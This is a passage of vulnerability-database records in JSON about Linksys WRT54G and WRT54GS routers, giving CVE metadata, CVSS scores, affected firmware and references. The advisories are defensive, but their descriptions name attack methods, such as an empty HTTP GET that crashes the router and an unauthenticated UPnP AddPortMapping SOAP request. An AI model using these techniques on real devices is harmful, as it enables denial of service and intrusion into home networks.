"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31389"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004205"
},
{
"db": "NVD",
"id": "CVE-2008-1264"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://www.gnucitizen.org/projects/router-hacking-challenge/"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/489009/100/0/threaded"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/41126"
},
{
"trust": 0.9,
"url": "http://xforce.iss.net/xforce/xfdb/41126"
},
{
"trust": 0.9,
"url": "http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-1264"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2008-1264"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31389"
},
{
"db": "BID",
"id": "85075"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004205"
},
{
"db": "NVD",
"id": "CVE-2008-1264"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-142"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-31389"
},
{
"db": "BID",
"id": "85075"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004205"
},
{
"db": "NVD",
"id": "CVE-2008-1264"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-142"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-03-10T00:00:00",
"db": "VULHUB",
"id": "VHN-31389"
},
{
"date": "2008-03-10T00:00:00",
"db": "BID",
"id": "85075"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-004205"
},
{
"date": "2008-03-10T17:44:00",
"db": "NVD",
"id": "CVE-2008-1264"
},
{
"date": "2008-03-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200803-142"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-11T00:00:00",
"db": "VULHUB",
"id": "VHN-31389"
},
{
"date": "2008-03-10T00:00:00",
"db": "BID",
"id": "85075"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-004205"
},
{
"date": "2018-10-11T20:31:24.543000",
"db": "NVD",
"id": "CVE-2008-1264"
},
{
"date": "2008-09-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200803-142"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200803-142"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G In the router nvram.cfg Vulnerability to access important files such as",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004205"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200803-142"
}
],
"trust": 0.6
}
}
VAR-200509-0380
Vulnerability from variot - Updated: 2022-05-17 02:02Multiple vulnerabilities have been identified in Linksys WRT54G routers. These issue all require that an attacker have access to either the wireless, or internal LAN network segments of the affected device. Exploitation from the WAN interface is only possible if the affected device has remote management enabled. This issue allows attackers to: - Download and replace the configuration of affected routers. - Execute arbitrary machine code in the context of the affected device. - Utilize HTTP POST requests to upload router configuration and firmware files without proper authentication - Degrade the performance of affected devices and cause the Web server to become unresponsive, potentially denying service to legitimate users.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200509-0380",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.20.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.0.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.3.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.1.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.4.4"
}
],
"sources": [
{
"db": "BID",
"id": "14822"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "These vulnerabilities were discovered by Greg MacManus of iDEFENSE Labs.",
"sources": [
{
"db": "BID",
"id": "14822"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple vulnerabilities have been identified in Linksys WRT54G routers. These issue all require that an attacker have access to either the wireless, or internal LAN network segments of the affected device. Exploitation from the WAN interface is only possible if the affected device has remote management enabled.\nThis issue allows attackers to:\n- Download and replace the configuration of affected routers.\n- Execute arbitrary machine code in the context of the affected device.\n- Utilize HTTP POST requests to upload router configuration and firmware files without proper authentication\n- Degrade the performance of affected devices and cause the Web server to become unresponsive, potentially denying service to legitimate users.",
"sources": [
{
"db": "BID",
"id": "14822"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "14822",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "14822"
}
]
},
"id": "VAR-200509-0380",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.5353147
},
"last_update_date": "2022-05-17T02:02:57.006000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.linksys.com/"
},
{
"trust": 0.3,
"url": "http://www.idefense.com/application/poi/display?id=306\u0026type=vulnerabilities"
},
{
"trust": 0.3,
"url": "http://www.idefense.com/application/poi/display?id=307\u0026type=vulnerabilities"
},
{
"trust": 0.3,
"url": "http://www.idefense.com/application/poi/display?id=308\u0026type=vulnerabilities"
},
{
"trust": 0.3,
"url": "http://www.idefense.com/application/poi/display?id=305\u0026type=vulnerabilities"
},
{
"trust": 0.3,
"url": "http://www.idefense.com/application/poi/display?id=304\u0026type=vulnerabilities"
},
{
"trust": 0.3,
"url": "http://www.linksys.com/products/product.asp?prid=508\u0026scid=35"
}
],
"sources": [
{
"db": "BID",
"id": "14822"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "14822"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-09-13T00:00:00",
"db": "BID",
"id": "14822"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-09-13T00:00:00",
"db": "BID",
"id": "14822"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "14822"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G Wireless Router Multiple Remote Vulnerabilities",
"sources": [
{
"db": "BID",
"id": "14822"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "14822"
}
],
"trust": 0.3
}
}
VAR-200312-0518
Vulnerability from variot - Updated: 2022-05-17 01:47The Linksys WRT54G Router is a router device. The Linksys WRT54G Router is not properly handling some of the GET requests, and the remote attacker can exploit this vulnerability to restart the router. Sending an empty GET request to the router embedded in port 80 of the WEB system listening will cause the router to be restarted, causing a denial of service attack. It has been reported that when the affected appliance handles a request of this type the embedded web server will halt, requiring the appliance to be power cycled in order to regain normal functionality
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200312-0518",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": null,
"scope": null,
"trust": 0.6,
"vendor": "no",
"version": null
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.00.8"
},
{
"model": "wpc300n wireless-n notebook adapter",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "-4.100.15.5"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-3527"
},
{
"db": "BID",
"id": "9152"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Discovery of this vulnerability has been credited to carbon@techcentric.net.",
"sources": [
{
"db": "BID",
"id": "9152"
}
],
"trust": 0.3
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.1,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2003-3527",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2003-3527",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-3527"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Linksys WRT54G Router is a router device. The Linksys WRT54G Router is not properly handling some of the GET requests, and the remote attacker can exploit this vulnerability to restart the router. Sending an empty GET request to the router embedded in port 80 of the WEB system listening will cause the router to be restarted, causing a denial of service attack. It has been reported that when the affected appliance handles a request of this type the embedded web server will halt, requiring the appliance to be power cycled in order to regain normal functionality",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-3527"
},
{
"db": "BID",
"id": "9152"
}
],
"trust": 0.81
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "9152",
"trust": 0.9
},
{
"db": "CNVD",
"id": "CNVD-2003-3527",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-3527"
},
{
"db": "BID",
"id": "9152"
}
]
},
"id": "VAR-200312-0518",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-3527"
}
],
"trust": 1.1353147
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-3527"
}
]
},
"last_update_date": "2022-05-17T01:47:37.712000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=107049411717616\u0026w=2"
},
{
"trust": 0.3,
"url": "http://www.linksys.com/products/product.asp?prid=508\u0026scid=35"
},
{
"trust": 0.3,
"url": "/archive/1/346399"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-3527"
},
{
"db": "BID",
"id": "9152"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2003-3527"
},
{
"db": "BID",
"id": "9152"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2003-12-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2003-3527"
},
{
"date": "2003-12-03T00:00:00",
"db": "BID",
"id": "9152"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2003-3527"
},
{
"date": "2003-12-03T00:00:00",
"db": "BID",
"id": "9152"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "9152"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G Router Empty HTTP GET Request Remote Denial of Service Attack Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-3527"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Failure to Handle Exceptional Conditions",
"sources": [
{
"db": "BID",
"id": "9152"
}
],
"trust": 0.3
}
}
FKIE_CVE-2011-4499
Vulnerability from fkie_nvd - Published: 2011-11-22 11:55 - Updated: 2025-04-11 00:51
Severity ?
Summary
The UPnP IGD implementation in the Broadcom UPnP stack on the Cisco Linksys WRT54G with firmware before 4.30.5, WRT54GS v1 through v3 with firmware before 4.71.1, and WRT54GS v4 with firmware before 1.06.1 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an "external forwarding" vulnerability.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| cisco | linksys_wrt54g_router_firmware | * | |
| cisco | linksys_wrt54g_router_firmware | 3.03.9 | |
| cisco | linksys_wrt54g_router_firmware | 4.20.7 | |
| linksys | wrt54g | * | |
| linksys | wrt54g | 2.2 | |
| cisco | linksys_wrt54gs_router_firmware | * | |
| cisco | linksys_wrt54gs_router_firmware | 2.09.1 | |
| linksys | wrt54gs | 1.0 | |
| linksys | wrt54gs | 2.0 | |
| linksys | wrt54gs | 3.0 | |
| cisco | linksys_wrt54gs_router_firmware | * | |
| linksys | wrt54gs | 4.0 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cisco:linksys_wrt54g_router_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "07169C87-D8A2-43A0-8F36-7307F8A53586",
"versionEndIncluding": "4.20.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:cisco:linksys_wrt54g_router_firmware:3.03.9:*:*:*:*:*:*:*",
"matchCriteriaId": "31F69390-77E1-4122-8869-0D09F482F21A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:cisco:linksys_wrt54g_router_firmware:4.20.7:*:*:*:*:*:*:*",
"matchCriteriaId": "CDCDBCE4-FC0D-4328-AC1D-97E45A222B31",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:linksys:wrt54g:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DBBECE9D-7805-4521-A0B1-15F2755312B8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:linksys:wrt54g:2.2:*:*:*:*:*:*:*",
"matchCriteriaId": "C838786E-835E-42C9-A02E-90E29911280E",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cisco:linksys_wrt54gs_router_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0C5EEE41-55BF-40CE-A0EB-1D83CC1B1340",
"versionEndIncluding": "4.70.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:cisco:linksys_wrt54gs_router_firmware:2.09.1:*:*:*:*:*:*:*",
"matchCriteriaId": "9D58336D-0F52-46B4-B14D-490D1722CA66",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:linksys:wrt54gs:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "2D6094DD-5683-42F8-B19A-899D8728F3D1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:linksys:wrt54gs:2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "0B90EA29-14A0-412C-B375-80F72FF0E50C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:linksys:wrt54gs:3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DA3BD04C-B77D-4CF0-8EB8-9BDF2513C061",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cisco:linksys_wrt54gs_router_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4582AD75-3093-443A-8770-F540A83E4B6A",
"versionEndIncluding": "1.06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:linksys:wrt54gs:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1E9C1BA7-E192-4E61-B500-4F6C8FFA82A8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The UPnP IGD implementation in the Broadcom UPnP stack on the Cisco Linksys WRT54G with firmware before 4.30.5, WRT54GS v1 through v3 with firmware before 4.71.1, and WRT54GS v4 with firmware before 1.06.1 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an \"external forwarding\" vulnerability."
},
{
"lang": "es",
"value": "La implementaci\u00f3n de IGD UPnP de la pila UPnP Broadcom de Cisco Linksys WRT54G con firmware anterior a 4.30.5, de WRT54GS v1 hasta la versi\u00f3n v3 con firmware anterior a 4.71.1 y Wde RT54GS v4 con firmware anterior a 1.06.1 permite a atacantes remotos establecer \"mappings\" a puertos arbitrarios enviando una acci\u00f3n UPnP AddPortMapping en una petici\u00f3n SOAP a un interfaz WAN. Relacionado con una vulnerabilidad de \"direccionamiento externo\" (\"external forwarding\")."
}
],
"id": "CVE-2011-4499",
"lastModified": "2025-04-11T00:51:21.963",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2011-11-22T11:55:04.683",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/357851"
},
{
"source": "cve@mitre.org",
"url": "http://www.upnp-hacks.org/devices.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/357851"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.upnp-hacks.org/devices.html"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-16"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}